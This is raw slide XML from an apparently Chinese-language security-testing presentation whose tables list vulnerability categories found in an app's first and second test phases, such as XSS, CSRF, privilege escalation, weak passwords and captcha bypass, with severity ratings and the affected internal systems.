                        <a:t>序号</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>漏洞名称</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>特点</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>出现系统</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="295161">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>跨站（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
                        <a:t>xss</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>）</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>高危、多发</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>E</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>再系统</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>、</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="299110">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" u="none" strike="noStrike" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>越权</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>高危、多发</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247"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E</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>再系统</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>、</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="299110">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" u="none" strike="noStrike" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
                        <a:t>csrf</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" u="none" strike="noStrike" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>     高危</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247"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E</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>再系统</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="299110">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" u="none" strike="noStrike" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>敏感信息泄露</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247"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u="none" strike="noStrike" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    多发</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247"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E</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>再系统</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>、再医平台</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="299110">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" u="none" strike="noStrike" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>未授权访问</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>高危、多发</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>移动办公</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9247" marR="9247" marT="9247" marB="0"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smtClean="0"/>
              <a:t>中再第一阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>APP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>客户端高危中危漏洞 、多发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>漏洞</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95628722"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="709974" y="1988840"/>
          <a:ext cx="7901533" cy="1679812"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{69C7853C-536D-4A76-A0AE-DD22124D55A5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="666107"/>
                <a:gridCol w="2043791"/>
                <a:gridCol w="936104"/>
                <a:gridCol w="4255531"/>
              </a:tblGrid>
              <a:tr h="419953">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>序号</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u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>漏洞名称</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u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>特点</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u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>出现系统</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419953">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>组件安全</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>多发</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="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移动办公</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="419953">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>键盘劫持</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>低危</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>移动办公</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="419953">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>信息泄露</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>多发</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="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移动办公</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178718" y="260648"/>
            <a:ext cx="6715125" cy="511175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用检测第一阶段、第二阶段漏洞</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47652" y="1268760"/>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94802"/>
            <a:ext cx="6624637" cy="6063198"/>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逻辑缺陷： 后台认证绕过漏洞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口令管理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弱</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>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sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="790483"/>
            <a:ext cx="6624637" cy="5139869"/>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密码</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>明文传输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验证码可绕过或重复使用</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任意密码登录</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其他常见漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>跨站点请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据库访问控制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>会话</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>标识未更新</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
